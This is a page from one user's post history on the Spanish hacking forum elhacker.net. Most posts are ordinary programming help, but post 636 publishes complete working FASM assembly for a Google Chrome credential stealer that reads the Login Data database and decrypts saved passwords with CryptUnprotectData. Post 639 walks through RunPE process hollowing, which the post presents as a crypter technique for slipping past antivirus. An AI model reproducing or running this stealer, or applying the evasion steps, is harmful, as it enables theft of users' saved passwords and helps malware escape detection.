elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 [64] 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 ... 126
631  Programación / Programación C/C++ / Re: Problema con qt en: 25 Enero 2016, 15:24 pm
Las imágenes están en la carpeta del proyecto?
632  Foros Generales / Foro Libre / Re: ¿Que teclado utilizan los medicos en España? Me encanta!! en: 23 Enero 2016, 19:39 pm
El teclado de los médicos es este.




 :laugh: :laugh: :laugh: :laugh:
633  Programación / Programación C/C++ / Re: alguien me podria ayudar c++ noob en: 23 Enero 2016, 15:34 pm
Hola,

Esta es tu tarea con lo cual la tienes que hacer tu...

¿Hay alguna parte en el código que no entiendas? Con eso si te puedo ayudar.

saludos.

PD: Eso es C, no C++.
634  Programación / .NET (C#, VB.NET, ASP) / Re: VisualBasic???? Alguien me puede decir cosas sobre él? en: 23 Enero 2016, 13:20 pm
En los temas pegados tienes muchas respestas:

foro.elhacker.net/programacion_visual_basic/rddddecopilacion_de_enlaces_de_visual_basic-t68352.0.html

saludos.
635  Programación / Programación C/C++ / Re: Duplicar un caracter en una cadena en: 22 Enero 2016, 12:58 pm
Aquí tienes tu solución, intenta usar las etiquetas para poner código, es mucho mas fácil leerlo...  :xD

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. void DuplicaLetraEnCadena(char * Cadena, char Letra);
  6.  
  7. int main()
  8. {
  9.    char cadena[255];
  10.    char letra;
  11.  
  12.    printf("Introduce una frase: ");
  13.    fgets(cadena, 255, stdin);
  14.  
  15.    printf("Introduce la letra a duplicar: ");
  16.    scanf("%c",&letra);
  17.  
  18.    DuplicaLetraEnCadena(cadena, letra);
  19.    return 0;
  20. }
  21.  
  22. void DuplicaLetraEnCadena(char * Cadena, char Letra)
  23. {
  24.    int i;
  25.  
  26.    for (i = 0; i < strlen(Cadena); i++)
  27.    {
  28.        if(Cadena[i] == Letra)
  29.        {
  30.            printf("%c%c", Cadena[i], Cadena[i]);
  31.        }else{
  32.            printf("%c", Cadena[i]);
  33.        }
  34.    }
  35. }

saludos.
636  Seguridad Informática / Análisis y Diseño de Malware / [ASM] Stealer Google Chrome. en: 21 Enero 2016, 08:58 am
Bueno, antes de nada este código se lo quiero dedicar a kub0x, que le gustan los códigos en ensamblador  :laugh:

Es un Stealer del navegador Google Chrome, funcional con la última versión.



Código fuente:

Código
  1. ; Stealer Google Chrome
  2. ; Programado por Juan fary.
  3. ; Flat Assembler.
  4.  
  5. format PE Console 4.0
  6. entry start
  7. include 'win32ax.inc'
  8.  
  9. section '.data' data readable writeable
  10.        ruta         db '\Local\Google\Chrome\User Data\Default\Login Data',0
  11.        query        db 'SELECT origin_url, username_value, password_value FROM logins',0
  12.  
  13.        bd           dd ?
  14.        stmt         dd ?
  15.  
  16.        URL          db 'URL: %s',10,13,0
  17.        Usuario      db 'Usuario: %s',10,13,0
  18.        PASS         db 'PASS: %s',10,13,0
  19.  
  20.        struct DATA_BLOB
  21.               cbData   dd ?
  22.               pbData   dd ?
  23.        ends
  24.  
  25.        datain      DATA_BLOB
  26.        dataout     DATA_BLOB
  27.  
  28.        buffer      rb 255
  29.  
  30.        barra       db '-----------------------------------------------------',10,13,0
  31.  
  32.        BufferRuta  rb 512
  33.        APPDATA     db 'APPDATA',0
  34.  
  35. section '.code' code readable executable
  36. start:
  37.        invoke GetEnvironmentVariableA, APPDATA, BufferRuta,512
  38.        invoke lstrcat, BufferRuta, ruta
  39.  
  40.        cinvoke sqlite3_open, BufferRuta, bd
  41.        cmp eax, 0 ; eax = SQLITE_OK
  42.        jne salir
  43.  
  44.        cinvoke sqlite3_prepare_v2, [bd] , query, -1 ,stmt,0
  45.        cmp eax, 0 ; eax = SQLITE_OK
  46.        jne salir
  47.  
  48.    BuclePass:
  49.        cinvoke sqlite3_step, [stmt]
  50.        cmp eax, 100 ; eax = SQLITE_ROW
  51.        jne salir
  52.  
  53.        cinvoke printf,barra
  54.  
  55.        cinvoke sqlite3_column_text , [stmt], 0  ; URL
  56.        cinvoke printf,URL,eax
  57.  
  58.        cinvoke sqlite3_column_text , [stmt], 1  ; USUARIO
  59.        cinvoke printf,Usuario,eax
  60.  
  61.        cinvoke sqlite3_column_text , [stmt], 2  ; Contraseña
  62.  
  63.        mov [datain.pbData], eax
  64.        mov [datain.cbData], 512
  65.  
  66.        invoke CryptUnprotectData , datain, 0, 0, 0, 0, 0, dataout
  67.  
  68.        mov ecx, -1
  69.     BucleNull:
  70.        mov edx, [dataout.pbData]
  71.        inc ecx
  72.  
  73.        cmp byte[edx+ecx],0x08
  74.        jne BucleNull
  75.  
  76.        mov byte[edx+ecx],0
  77.  
  78.        cinvoke printf, PASS, [dataout.pbData]
  79.  
  80.        cinvoke printf,barra
  81.  
  82.        jmp BuclePass
  83.  
  84.        salir:
  85.        cinvoke system,'PAUSE'
  86.        ret
  87.  
  88. section '.idata' import data readable writeable
  89.  
  90.        library  sqlite3, 'sqlite3.dll',\
  91.                 msvcrt, 'msvcrt.dll',\
  92.                 Crypt32, 'Crypt32.dll',\
  93.                 KERNEL32, 'KERNEL32.DLL'
  94.  
  95.        import sqlite3,\
  96.               sqlite3_open, 'sqlite3_open',\
  97.               sqlite3_prepare_v2, 'sqlite3_prepare_v2',\
  98.               sqlite3_column_text, 'sqlite3_column_text',\
  99.               sqlite3_step, 'sqlite3_step'
  100.  
  101.        import msvcrt,\
  102.               printf, 'printf',\
  103.               memcpy,'memcpy',\
  104.               system, 'system'
  105.  
  106.        import Crypt32,\
  107.               CryptUnprotectData, 'CryptUnprotectData'
  108.  
  109.        import KERNEL32,\
  110.               GetEnvironmentVariableA, 'GetEnvironmentVariableA',\
  111.               lstrcat, 'lstrcatA'

saludos.


637  Programación / Programación C/C++ / Re: Programar programa incerrable C++ en: 21 Enero 2016, 06:13 am
Pero Kaxperday... ten en cuenta que los otros procesos son NECESARIOS para que funcione el SO y el lo sabe.  :P
638  Seguridad Informática / Seguridad / Re: Eliminar virus tocapelotas en un PC muy lento en: 21 Enero 2016, 05:50 am
Ese tipo de virus se suelen eliminar muy bien con el disco de KAV Rescue, descargalo de aquí.

Por si no sabes como funciona te diré que, es una ISO, y lo tienes que arrancar desde la BIOS, una vez arrancado escaneas el disco duro con el y ya te digo que este tipo de programas los suele eliminar.

PD: si por casualidad consiges el ejecutable no estaría de más que dejaras una muestra por aquí.

saludos y ya nos contarás como fue la operación  >:D.

639  Seguridad Informática / Análisis y Diseño de Malware / Re: como crear mi propio runpe guias en: 21 Enero 2016, 05:40 am
@Zerointhewill
la parte del runpe quiero aprender hacer uno propio . por mi misma cuenta por donde debo empezar  :D , veo que utilizan varias api

Se ha explicado en varias ocasiones en el foro, aquí puedes ver una de las descripciones:

https://foro.elhacker.net/analisis_y_diseno_de_malware/funcionamiento_de_un_runpe-t362805.0.html

Y Aquí te cito una explicación mas técnica por The Swash.

Buena tarde,
Con respecto a las respuestas, todas están erradas, pero vamos no del todo y no es por desmeritarles. En realidad el RunPE obviamente tiene estrecha relación con el Formato PE, pero no es exactamente eso.
El famoso RunPE es una técnica la cual permite ejecutar archivos ("on the fly" - Karcrack), es decir sin necesidad de que el archivo ocupe tamaño físico, esto se hace porque el archivo está plasmado en un buffer en memoria. Esta técnica es usada en malware generalmente en Cifradores, los cuales tienen en su cuerpo el archivo cifrado, luego en memoria lo descifran y lo ejecutan, y esto no llamará mucho la atención.

Como funciona un RunPE:
  • Comprobar que es un ejecutable válido (MZ & PE/x0/x0 Signature).
  • Crear un nuevo proceso suspendido (Generalmente con el mismo ejecutable).
  • Desasignar la proyección del archivo en ese proceso, ImageBase. (Limpiar el ejecutable del proceso).
  • Obtener contextos (Registros).
  • Reservar en memoria la dirección del ImageBase del ejecutable con un tamaño del campo SizeOfImage. (ImageBase y SizeOfImage del archivo a ejecutar).
  • Escribir la cabecera y las secciones alineadas por el campo SectionAlignment.
  • Editar EAX en los registros leídos por la dirección del punto de entrada del archivo a ejecutar.
  • Editar EBX + 8 por el ImageBase del ejecutable a cargar (Cambiar base de la imagen del nuevo proceso).
  • Editar con el nuevo contexto (Escribir registros).
  • Iniciar el proceso suspendido.

Un saludo.

@Inflamable!!!

ya claro lo dejas indetectado a la hora de analizar y cuando lo ejecutas lo elimina,pero yo la verdad no se por donde empezar,ya anduve echando un ojo,porque la verdad esta bien saber hacerlos tu mismo para no tener que andar pagando y ademas que si te lo dan echo ya no tiene gracia a mi lo que me gustaria seria tener mi codigo para luego modearlo y cada vez que se queme,pero si no pasa ni una proactiva es tonteria.
saludos.

En realidad esta técnica es ya bastante detectada por los antivirus. La técnica que aquí te voy a dejar debajo, también te sirve como RunPE y es muchísimo mejor ya que no tienes que crear ni desmapear un proceso externo, en desventaja te diré que es un poco más complicada de entender.

http://foro.elhacker.net/analisis_y_diseno_de_malware/ejecucion_de_archivos_desde_memoria_base_relocation-t264564.20.html

saludos.
640  Programación / Programación General / Re: bug no cerrar procesos en windows 7 32/64 en: 20 Enero 2016, 18:25 pm
Sí.
Páginas: 1 ... 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 [64] 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 ... 126
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines